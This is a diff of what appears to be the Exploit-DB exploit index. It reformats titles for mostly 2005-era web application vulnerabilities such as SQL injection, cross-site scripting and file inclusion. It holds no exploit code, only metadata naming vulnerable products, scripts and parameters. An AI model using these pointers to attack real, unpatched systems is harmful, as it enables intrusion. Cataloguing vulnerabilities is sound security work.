Injection",2005-04-20,Dcrab,asp,webapps,0 +25484,platforms/asp/webapps/25484.txt,"DUportal 3.1.2 - 'inc_rating.asp' Multiple SQL Injections",2005-04-20,Dcrab,asp,webapps,0 25488,platforms/php/webapps/25488.txt,"ProfitCode Software PayProCart 3.0 - 'Username' Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 25489,platforms/php/webapps/25489.txt,"ProfitCode Software PayProCart 3.0 - Ckprvd Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 25490,platforms/php/webapps/25490.txt,"ProfitCode Software PayProCart 3.0 - AdminShop HDoc Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 @@ -28346,36 +28347,36 @@ id,file,description,date,author,platform,type,port 25542,platforms/asp/webapps/25542.txt,"MetaCart2 - strSubCatalog_NAME Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 25543,platforms/asp/webapps/25543.txt,"MetaCart2 - 'SearchAction.asp' Multiple SQL Injections",2005-04-26,Dcrab,asp,webapps,0 25544,platforms/asp/webapps/25544.txt,"MetaBid Auctions - intAuctionID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 -25545,platforms/php/webapps/25545.txt,"BBlog 0.7.4 - 'PostID' Parameter SQL Injection",2004-04-26,jericho+bblog@attrition.org,php,webapps,0 +25545,platforms/php/webapps/25545.txt,"BBlog 0.7.4 - 'PostID' SQL Injection",2004-04-26,jericho+bblog@attrition.org,php,webapps,0 25548,platforms/php/webapps/25548.txt,"PHPCart - Input Validation",2005-04-27,Lostmon,php,webapps,0 -25549,platforms/php/webapps/25549.txt,"Claroline 1.5/1.6 - toolaccess_details.php tool Parameter Cross-Site Scripting",2005-04-27,"Sieg Fried",php,webapps,0 -25550,platforms/php/webapps/25550.txt,"Claroline 1.5/1.6 - user_access_details.php data Parameter Cross-Site Scripting",2005-04-27,"Sieg Fried",php,webapps,0 -25551,platforms/php/webapps/25551.txt,"Claroline 1.5/1.6 - myagenda.php coursePath Parameter Cross-Site Scripting",2005-04-27,"Sieg Fried",php,webapps,0 -25552,platforms/php/webapps/25552.txt,"Claroline E-Learning 1.5/1.6 - 'userInfo.php' Multiple Parameter SQL Injections",2005-04-27,"Sieg Fried",php,webapps,0 -25553,platforms/php/webapps/25553.txt,"Claroline E-Learning 1.5/1.6 - exercises_details.php exo_id Parameter SQL Injection",2005-04-27,"Sieg Fried",php,webapps,0 +25549,platforms/php/webapps/25549.txt,"Claroline 1.5/1.6 - 'toolaccess_details.php?tool' Cross-Site Scripting",2005-04-27,"Sieg Fried",php,webapps,0 +25550,platforms/php/webapps/25550.txt,"Claroline 1.5/1.6 - 'user_access_details.php?data' Cross-Site Scripting",2005-04-27,"Sieg Fried",php,webapps,0 +25551,platforms/php/webapps/25551.txt,"Claroline 1.5/1.6 - 'myagenda.php?coursePath' Cross-Site Scripting",2005-04-27,"Sieg Fried",php,webapps,0 +25552,platforms/php/webapps/25552.txt,"Claroline E-Learning 1.5/1.6 - 'userInfo.php' Multiple SQL Injections",2005-04-27,"Sieg Fried",php,webapps,0 +25553,platforms/php/webapps/25553.txt,"Claroline E-Learning 1.5/1.6 - 'exercises_details.php?exo_id' SQL Injection",2005-04-27,"Sieg Fried",php,webapps,0 25555,platforms/php/webapps/25555.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' P Parameter SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps,0 25556,platforms/php/webapps/25556.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' Q Parameter SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps,0 25558,platforms/php/webapps/25558.txt,"Notes Module for phpBB - SQL Injection",2005-04-28,"James Bercegay",php,webapps,0 -25560,platforms/php/webapps/25560.txt,"Just William's Amazon Webstore - Closeup.php Image Parameter Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 -25564,platforms/php/webapps/25564.txt,"Just William's Amazon Webstore - CurrentIsExpanded Parameter Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 -25565,platforms/php/webapps/25565.txt,"Just William's Amazon Webstore - searchFor Parameter Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 -25566,platforms/php/webapps/25566.txt,"Just William's Amazon Webstore - CurrentNumber Parameter Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 +25560,platforms/php/webapps/25560.txt,"Just William's Amazon Webstore - 'Closeup.php?Image' Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 +25564,platforms/php/webapps/25564.txt,"Just William's Amazon Webstore - 'CurrentIsExpanded' Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 +25565,platforms/php/webapps/25565.txt,"Just William's Amazon Webstore - 'searchFor' Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 +25566,platforms/php/webapps/25566.txt,"Just William's Amazon Webstore - 'CurrentNumber' Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 25567,platforms/php/webapps/25567.txt,"Just William's Amazon Webstore - HTTP Response Splitting",2005-04-28,Lostmon,php,webapps,0 25568,platforms/php/webapps/25568.txt,"phpCOIN 1.2 - 'login.php' PHPcoinsessid Parameter SQL Injection",2005-04-28,Dcrab,php,webapps,0 -25569,platforms/php/webapps/25569.txt,"phpCOIN 1.2 Pages Module - Multiple Parameter SQL Injection",2005-04-28,Dcrab,php,webapps,0 -25570,platforms/php/webapps/25570.txt,"JGS-Portal 3.0.1 - 'ID' Parameter SQL Injection",2005-04-30,admin@batznet.com,php,webapps,0 -25575,platforms/php/webapps/25575.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - basket.php Multiple Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 +25569,platforms/php/webapps/25569.txt,"phpCOIN 1.2 Pages Module - Multiple SQL Injections",2005-04-28,Dcrab,php,webapps,0 +25570,platforms/php/webapps/25570.txt,"JGS-Portal 3.0.1 - 'ID' SQL Injection",2005-04-30,admin@batznet.com,php,webapps,0 +25575,platforms/php/webapps/25575.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'basket.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-02,Lostmon,php,webapps,0 25576,platforms/php/webapps/25576.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'page.php' page Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 -25577,platforms/php/webapps/25577.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - reviews.php Multiple Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 -25578,platforms/php/webapps/25578.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - product_details.php category_id Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 -25579,platforms/php/webapps/25579.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - products.php Multiple Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 -25580,platforms/php/webapps/25580.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'news_view.php' Multiple Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 +25577,platforms/php/webapps/25577.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'reviews.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-02,Lostmon,php,webapps,0 +25578,platforms/php/webapps/25578.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'product_details.php?category_id' Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 +25579,platforms/php/webapps/25579.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'products.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-02,Lostmon,php,webapps,0 +25580,platforms/php/webapps/25580.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'news_view.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-02,Lostmon,php,webapps,0 25720,platforms/php/webapps/25720.txt,"Vanilla Forums 2.0.18.8 - Multiple Vulnerabilities",2013-05-26,"Henry Hoggard",php,webapps,0 25585,platforms/asp/webapps/25585.txt,"Maxwebportal 1.3 - dl_popular.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 25586,platforms/asp/webapps/25586.txt,"Maxwebportal 1.3 - links_popular.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 25587,platforms/asp/webapps/25587.txt,"Maxwebportal 1.3 - pic_popular.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 25588,platforms/asp/webapps/25588.txt,"Maxwebportal 1.3 - dl_toprated.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 -25589,platforms/asp/webapps/25589.txt,"Maxwebportal 1.3 - custom_link.asp Multiple Parameter SQL Injection",2005-05-02,s-dalili,asp,webapps,0 +25589,platforms/asp/webapps/25589.txt,"Maxwebportal 1.3 - 'custom_link.asp' Multiple SQL Injections",2005-05-02,s-dalili,asp,webapps,0 25590,platforms/php/webapps/25590.txt,"osTicket 1.2/1.3 - Multiple Input Validation / Remote Code Injection Vulnerabilities",2005-05-03,"James Bercegay",php,webapps,0 25591,platforms/php/webapps/25591.txt,"SitePanel2 2.6.1 - Multiple Input Validation Vulnerabilities",2005-05-03,"James Bercegay",php,webapps,0 25592,platforms/cgi/webapps/25592.txt,"WebCrossing WebX 5.0 - Cross-Site Scripting",2005-05-03,dr_insane,cgi,webapps,0 @@ -28384,25 +28385,25 @@ id,file,description,date,author,platform,type,port 25595,platforms/asp/webapps/25595.txt,"ASP Inline Corporate Calendar 3.6.3 - Defer.asp SQL Injection",2005-05-04,Zinho,asp,webapps,0 25596,platforms/asp/webapps/25596.txt,"ASP Inline Corporate Calendar 3.6.3 - Details.asp SQL Injection",2005-05-04,Zinho,asp,webapps,0 25599,platforms/php/webapps/25599.txt,"Interspire articlelive 2005 - Multiple Vulnerabilities",2005-05-04,Dcrab,php,webapps,0 -25601,platforms/php/webapps/25601.txt,"FishCart 3.1 - display.php nlst Parameter Cross-Site Scripting",2005-05-04,Dcrab,php,webapps,0 -25602,platforms/php/webapps/25602.txt,"FishCart 3.1 - upstracking.php Multiple Parameter Cross-Site Scripting",2005-05-04,Dcrab,php,webapps,0 -25603,platforms/php/webapps/25603.txt,"FishCart 3.1 - display.php psku Parameter SQL Injection",2005-05-04,Dcrab,php,webapps,0 -25604,platforms/php/webapps/25604.txt,"FishCart 3.1 - upstnt.php cartid Parameter SQL Injection",2005-05-04,Dcrab,php,webapps,0 +25601,platforms/php/webapps/25601.txt,"FishCart 3.1 - 'display.php?nlst' Cross-Site Scripting",2005-05-04,Dcrab,php,webapps,0 +25602,platforms/php/webapps/25602.txt,"FishCart 3.1 - 'upstracking.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-04,Dcrab,php,webapps,0 +25603,platforms/php/webapps/25603.txt,"FishCart 3.1 - 'display.php?psku' SQL Injection",2005-05-04,Dcrab,php,webapps,0 +25604,platforms/php/webapps/25604.txt,"FishCart 3.1 - 'upstnt.php?cartid' SQL Injection",2005-05-04,Dcrab,php,webapps,0 25605,platforms/php/webapps/25605.txt,"WordPress Plugin ProPlayer 4.7.9.1 - SQL Injection",2013-05-21,"Ashiyane Digital Security Team",php,webapps,0 25606,platforms/php/webapps/25606.py,"Kimai 0.9.2.1306-3 - SQL Injection",2013-05-21,drone,php,webapps,0 -30092,platforms/php/webapps/30092.txt,"FlashChat F_CMS 4.7.9 - Parameter Multiple Remote File Inclusion",2007-05-28,"Hasadya Raed",php,webapps,0 +30092,platforms/php/webapps/30092.txt,"FlashChat F_CMS 4.7.9 - Multiple Remote File Inclusions",2007-05-28,"Hasadya Raed",php,webapps,0 25821,platforms/php/webapps/25821.txt,"Annuaire 1Two 1.0/1.1 - 'index.php' Cross-Site Scripting",2005-06-14,An0nym0uS,php,webapps,0 25823,platforms/php/webapps/25823.txt,"McGallery 1.0/1.1 - Lang Argument File Disclosure",2005-06-15,D_BuG,php,webapps,0 25824,platforms/php/webapps/25824.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - Multiple Input Validation Vulnerabilities",2005-06-15,"GulfTech Security",php,webapps,0 25825,platforms/php/webapps/25825.txt,"Ultimate PHP Board 1.8/1.9 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,"Alberto Trivero",php,webapps,0 25612,platforms/php/webapps/25612.txt,"MyBloggie 2.1 - 'index.php' Cross-Site Scripting",2005-05-05,"Alberto Trivero",php,webapps,0 -25614,platforms/php/webapps/25614.txt,"MidiCart PHP - Search_List.php SearchString Parameter SQL Injection",2005-05-05,Exoduks,php,webapps,0 -25615,platforms/php/webapps/25615.txt,"MidiCart PHP - Item_List.php MainGroup Parameter SQL Injection",2005-05-05,Exoduks,php,webapps,0 -25616,platforms/php/webapps/25616.txt,"MidiCart PHP - Item_List.php SecondGroup Parameter SQL Injection",2005-05-05,Exoduks,php,webapps,0 -25617,platforms/php/webapps/25617.txt,"MidiCart PHP - Item_Show.php Code_No Parameter SQL Injection",2005-05-05,Exoduks,php,webapps,0 -25618,platforms/php/webapps/25618.txt,"MidiCart PHP - Search_List.php SearchString Parameter Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0 -25619,platforms/php/webapps/25619.txt,"MidiCart PHP - Item_List.php SecondGroup Parameter Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0 -25620,platforms/php/webapps/25620.txt,"MidiCart PHP - Item_List.php MainGroup Parameter Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0 +25614,platforms/php/webapps/25614.txt,"MidiCart PHP - 'Search_List.php?SearchString' SQL Injection",2005-05-05,Exoduks,php,webapps,0 +25615,platforms/php/webapps/25615.txt,"MidiCart PHP - 'Item_List.php?MainGroup' SQL Injection",2005-05-05,Exoduks,php,webapps,0 +25616,platforms/php/webapps/25616.txt,"MidiCart PHP - 'Item_List.php?SecondGroup' SQL Injection",2005-05-05,Exoduks,php,webapps,0 +25617,platforms/php/webapps/25617.txt,"MidiCart PHP - 'Item_Show.php?Code_No' SQL Injection",2005-05-05,Exoduks,php,webapps,0 +25618,platforms/php/webapps/25618.txt,"MidiCart PHP - 'Search_List.php?SearchString' Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0 +25619,platforms/php/webapps/25619.txt,"MidiCart PHP - 'Item_List.php?SecondGroup' Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0 +25620,platforms/php/webapps/25620.txt,"MidiCart PHP - 'Item_List.php?MainGroup' Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0 25622,platforms/cgi/webapps/25622.txt,"MegaBook 2.0/2.1 - Admin.cgi EntryID Cross-Site Scripting",2005-05-05,"Spy Hat",cgi,webapps,0 25623,platforms/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 - 'OUT.php' SQL Injection",2005-05-06,Kold,php,webapps,0 25628,platforms/jsp/webapps/25628.txt,"phpBB 2.0.x - URL Tag BBCode.php",2005-05-09,Papados,jsp,webapps,0 @@ -28410,8 +28411,8 @@ id,file,description,date,author,platform,type,port 25632,platforms/cgi/webapps/25632.txt,"Easy Message Board - Directory Traversal",2005-05-09,"SoulBlack Group",cgi,webapps,0 25634,platforms/cgi/webapps/25634.txt,"Easy Message Board - Remote Command Execution",2005-05-09,"SoulBlack Group",cgi,webapps,0 25635,platforms/php/webapps/25635.txt,"PHP-Nuke 0-7 - Double Hex Encoded Input Validation",2005-05-09,fistfuxxer@gmx.de,php,webapps,0 -25637,platforms/php/webapps/25637.txt,"CodeThatShoppingCart 1.3.1 - catalog.php id Parameter Cross-Site Scripting",2005-05-09,Lostmon,php,webapps,0 -25638,platforms/php/webapps/25638.txt,"CodeThatShoppingCart 1.3.1 - catalog.php id Parameter SQL Injection",2005-05-09,Lostmon,php,webapps,0 +25637,platforms/php/webapps/25637.txt,"CodeThatShoppingCart 1.3.1 - 'catalog.php?id' Cross-Site Scripting",2005-05-09,Lostmon,php,webapps,0 +25638,platforms/php/webapps/25638.txt,"CodeThatShoppingCart 1.3.1 - 'catalog.php?id' SQL Injection",2005-05-09,Lostmon,php,webapps,0 25639,platforms/php/webapps/25639.txt,"PWSPHP 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-05-09,"SecuBox fRoGGz",php,webapps,0 25640,platforms/php/webapps/25640.txt,"PWSPHP 1.1/1.2 - Profil.php SQL Injection",2005-05-09,"SecuBox fRoGGz",php,webapps,0 25641,platforms/php/webapps/25641.txt,"WowBB 1.6 - View_User.php SQL Injection",2005-05-10,Megasky,php,webapps,0 @@ -28420,7 +28421,7 @@ id,file,description,date,author,platform,type,port 25645,platforms/php/webapps/25645.txt,"e107 Website System 0.617 - Forum_viewforum.php SQL Injection",2005-05-10,Heintz,php,webapps,0 25649,platforms/cgi/webapps/25649.txt,"showoff! digital media software 1.5.4 - Multiple Vulnerabilities",2011-05-11,dr_insane,cgi,webapps,0 25650,platforms/php/webapps/25650.txt,"Open Solution Quick.Cart 0.3 - 'index.php' Cross-Site Scripting",2005-05-11,Lostmon,php,webapps,0 -25651,platforms/asp/webapps/25651.txt,"Maxwebportal 1.3x - post.asp Multiple Parameter Cross-Site Scripting",2005-05-11,Zinho,asp,webapps,0 +25651,platforms/asp/webapps/25651.txt,"Maxwebportal 1.3x - 'post.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-05-11,Zinho,asp,webapps,0 25653,platforms/php/webapps/25653.txt,"DirectTopics 2 - topic.php SQL Injection",2005-05-12,"Morinex Eneco",php,webapps,0 25654,platforms/php/webapps/25654.txt,"Ultimate PHP Board 1.8/1.9 - viewforum.php Cross-Site Scripting",2005-05-13,"Morinex Eneco",php,webapps,0 25655,platforms/php/webapps/25655.txt,"Ultimate PHP Board 1.8/1.9 - viewforum.php SQL Injection",2005-05-13,"Morinex Eneco",php,webapps,0 @@ -28436,15 +28437,15 @@ id,file,description,date,author,platform,type,port 25666,platforms/cgi/webapps/25666.txt,"PServ 3.2 - Source Code Disclosure",2005-05-16,"Claus R. F. Overbeck",cgi,webapps,0 25667,platforms/asp/webapps/25667.txt,"MetaCart E-Shop - ProductsByCategory.asp Cross-Site Scripting",2005-05-16,"Dedi Dwianto",asp,webapps,0 25668,platforms/cgi/webapps/25668.txt,"Sigma ISP Manager 6.6 - 'Sigmaweb.dll' SQL Injection",2005-05-16,"mehran gashtasebi",cgi,webapps,0 -25671,platforms/php/webapps/25671.txt,"NPDS 4.8/5.0 - comments.php thold Parameter SQL Injection",2005-05-16,NoSP,php,webapps,0 -25672,platforms/php/webapps/25672.txt,"NPDS 4.8/5.0 - pollcomments.php thold Parameter SQL Injection",2005-05-16,NoSP,php,webapps,0 -25673,platforms/php/webapps/25673.txt,"JGS-Portal 3.0.1/3.0.2 - jgs_portal_statistik.php year Parameter SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 -25674,platforms/php/webapps/25674.txt,"JGS-Portal 3.0.1/3.0.2 - jgs_portal.php anzahl_beitraege Parameter SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 -25675,platforms/php/webapps/25675.txt,"JGS-Portal 3.0.1/3.0.2 - jgs_portal_beitraggraf.php year Parameter SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 -25676,platforms/php/webapps/25676.txt,"JGS-Portal 3.0.1/3.0.2 - jgs_portal_viewsgraf.php tag Parameter SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 -25677,platforms/php/webapps/25677.txt,"JGS-Portal 3.0.1/3.0.2 - jgs_portal_themengraf.php year Parameter SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 -25678,platforms/php/webapps/25678.txt,"JGS-Portal 3.0.1/3.0.2 - jgs_portal_mitgraf.php year Parameter SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 -25679,platforms/php/webapps/25679.txt,"JGS-Portal 3.0.1/3.0.2 - jgs_portal_sponsor.php id Parameter SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 +25671,platforms/php/webapps/25671.txt,"NPDS 4.8/5.0 - 'comments.php?thold' SQL Injection",2005-05-16,NoSP,php,webapps,0 +25672,platforms/php/webapps/25672.txt,"NPDS 4.8/5.0 - 'pollcomments.php?thold' SQL Injection",2005-05-16,NoSP,php,webapps,0 +25673,platforms/php/webapps/25673.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal_statistik.php?year' SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 +25674,platforms/php/webapps/25674.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal.php?anzahl_beitraege' SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 +25675,platforms/php/webapps/25675.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal_beitraggraf.php?year' SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 +25676,platforms/php/webapps/25676.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal_viewsgraf.php?tag' SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 +25677,platforms/php/webapps/25677.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal_themengraf.php?year' SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 +25678,platforms/php/webapps/25678.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal_mitgraf.php?year' SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 +25679,platforms/php/webapps/25679.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal_sponsor.php?id' SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 25681,platforms/php/webapps/25681.php,"Fusionphp Fusion News 3.3/3.6 - X-Forworded-For PHP Script Code Injection",2005-05-24,"Network security team",php,webapps,0 25682,platforms/php/webapps/25682.txt,"WordPress 1.5 - 'post.php' Cross-Site Scripting",2005-05-17,"Thomas Waldegger",php,webapps,0 25683,platforms/php/webapps/25683.txt,"Help Center Live 1.0/1.2.x - Multiple Input Validation Vulnerabilities",2005-05-24,"GulfTech Security",php,webapps,0 @@ -28453,20 +28454,20 @@ id,file,description,date,author,platform,type,port 25689,platforms/php/webapps/25689.txt,"EJ3 TOPo 2.2 - Multiple index.php Cross-Site Scripting Vulnerabilities",2003-05-20,Lostmon,php,webapps,0 25690,platforms/php/webapps/25690.pl,"PortailPHP 1.3 - ID Parameter SQL Injection",2005-05-23,"CENSORED Search Vulnerabilities",php,webapps,0 25693,platforms/php/webapps/25693.txt,"GForge 3.x - Arbitrary Command Execution",2005-05-24,"Filippo Spike Morelli",php,webapps,0 -25766,platforms/php/webapps/25766.txt,"Qualiteam X-Cart 4.0.8 - giftcert.php Multiple Parameter Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 +25766,platforms/php/webapps/25766.txt,"Qualiteam X-Cart 4.0.8 - 'giftcert.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 25700,platforms/asp/webapps/25700.txt,"Spread The Word - Multiple Cross-Site Scripting Vulnerabilities",2005-05-24,Lostmon,asp,webapps,0 25701,platforms/asp/webapps/25701.txt,"Spread The Word - Multiple SQL Injections",2005-05-24,Lostmon,asp,webapps,0 25702,platforms/java/webapps/25702.txt,"Sun JavaMail 1.x - Multiple Information Disclosure Vulnerabilities",2005-05-24,"Ricky Latt",java,webapps,0 25704,platforms/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 - 'Poll_Vote.php' Remote File Inclusion",2005-05-25,"rash ilusion",php,webapps,0 25705,platforms/asp/webapps/25705.txt,"FunkyASP AD Systems 1.1 - 'login.asp' SQL Injection",2005-05-25,Romty,asp,webapps,0 25715,platforms/hardware/webapps/25715.py,"HP LaserJet Pro P1606dn - Webadmin Password Reset",2013-05-26,m3tamantra,hardware,webapps,0 -25716,platforms/php/webapps/25716.py,"AVE.CMS 2.09 - 'index.php module' Parameter Blind SQL Injection",2013-05-26,mr.pr0n,php,webapps,0 +25716,platforms/php/webapps/25716.py,"AVE.CMS 2.09 - 'index.php?module' Blind SQL Injection",2013-05-26,mr.pr0n,php,webapps,0 25721,platforms/php/webapps/25721.txt,"WordPress Plugin User Role Editor 3.12 - Cross-Site Request Forgery",2013-05-26,"Henry Hoggard",php,webapps,0 25723,platforms/php/webapps/25723.txt,"WordPress Plugin Spider Event Calendar 1.3.0 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 25724,platforms/php/webapps/25724.txt,"WordPress Plugin Spider Catalog 1.4.6 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 -25726,platforms/php/webapps/25726.txt,"RadioCMS 2.2 - 'menager.php playlist_id' Parameter SQL Injection",2013-05-26,Rooster(XEKA),php,webapps,0 -25727,platforms/php/webapps/25727.txt,"BookReview 1.0 - add_review.htm Multiple Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 -25728,platforms/php/webapps/25728.txt,"BookReview 1.0 - add_contents.htm Multiple Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 +25726,platforms/php/webapps/25726.txt,"RadioCMS 2.2 - 'menager.php?playlist_id' SQL Injection",2013-05-26,Rooster(XEKA),php,webapps,0 +25727,platforms/php/webapps/25727.txt,"BookReview 1.0 - 'add_review.htm' Multiple Cross-Site Scripting Vulnerabilities",2005-05-26,Lostmon,php,webapps,0 +25728,platforms/php/webapps/25728.txt,"BookReview 1.0 - 'add_contents.htm' Multiple Cross-Site Scripting Vulnerabilities",2005-05-26,Lostmon,php,webapps,0 25729,platforms/php/webapps/25729.txt,"BookReview 1.0 - suggest_category.htm node Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 25730,platforms/php/webapps/25730.txt,"BookReview 1.0 - contact.htm user Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 25731,platforms/php/webapps/25731.txt,"BookReview 1.0 - add_booklist.htm node Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 @@ -28478,44 +28479,44 @@ id,file,description,date,author,platform,type,port 25739,platforms/jsp/webapps/25739.txt,"BEA WebLogic 7.0/8.1 - Administration Console Error Page Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0 25740,platforms/php/webapps/25740.txt,"Jaws Glossary 0.4/0.5 - Cross-Site Scripting",2005-05-27,Nah,php,webapps,0 25741,platforms/php/webapps/25741.bat,"Invision Power Board 1.x - Unauthorized Access",2005-05-28,V[i]RuS,php,webapps,0 -25742,platforms/php/webapps/25742.txt,"NPDS 4.8 < 5.0 - admin.php language Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 -25743,platforms/php/webapps/25743.txt,"NPDS 4.8 < 5.0 - powerpack_f.php language Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 -25744,platforms/php/webapps/25744.txt,"NPDS 4.8 < 5.0 - sdv_infos.php sitename Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 +25742,platforms/php/webapps/25742.txt,"NPDS 4.8 < 5.0 - 'admin.php?language' Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 +25743,platforms/php/webapps/25743.txt,"NPDS 4.8 < 5.0 - 'powerpack_f.php?language' Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 +25744,platforms/php/webapps/25744.txt,"NPDS 4.8 < 5.0 - 'sdv_infos.php?sitename' Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 25745,platforms/php/webapps/25745.txt,"NPDS 4.8 /5.0 - 'modules.php' Lettre Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 -25746,platforms/php/webapps/25746.txt,"NPDS 4.8 < 5.0 - reviews.php title Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 -25747,platforms/php/webapps/25747.txt,"NPDS 4.8 < 5.0 - reply.php image_subject Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 +25746,platforms/php/webapps/25746.txt,"NPDS 4.8 < 5.0 - 'reviews.php?title' Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 +25747,platforms/php/webapps/25747.txt,"NPDS 4.8 < 5.0 - 'reply.php?image_subject' Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 25748,platforms/php/webapps/25748.txt,"NPDS 4.8 < 5.0 - Glossaire Module terme Parameter SQL Injection",2005-05-28,NoSP,php,webapps,0 -25749,platforms/php/webapps/25749.txt,"NPDS 4.8 < 5.0 - links.php Query Parameter SQL Injection",2005-05-28,NoSP,php,webapps,0 -25750,platforms/php/webapps/25750.txt,"NPDS 4.8 < 5.0 - faq.php categories Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 +25749,platforms/php/webapps/25749.txt,"NPDS 4.8 < 5.0 - 'links.php?Query' SQL Injection",2005-05-28,NoSP,php,webapps,0 +25750,platforms/php/webapps/25750.txt,"NPDS 4.8 < 5.0 - 'faq.php?categories' Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 25751,platforms/asp/webapps/25751.txt,"OS4E - 'login.asp' SQL Injection",2005-05-28,"Dj romty",asp,webapps,0 -25753,platforms/asp/webapps/25753.txt,"Hosting Controller 6.1 - resellerresources.asp jresourceid Parameter SQL Injection",2005-05-28,"GrayHatz Security Group",asp,webapps,0 +25753,platforms/asp/webapps/25753.txt,"Hosting Controller 6.1 - 'resellerresources.asp?jresourceid' SQL Injection",2005-05-28,"GrayHatz Security Group",asp,webapps,0 25754,platforms/asp/webapps/25754.txt,"Hosting Controller 6.1 - plandetails.asp Information Disclosure",2005-05-28,"GrayHatz Security Group",asp,webapps,0 25756,platforms/php/webapps/25756.txt,"India Software Solution Shopping Cart - SQL Injection",2005-05-28,Rayden,php,webapps,0 25758,platforms/asp/webapps/25758.txt,"Hosting Controller 6.1 - User Profile Unauthorized 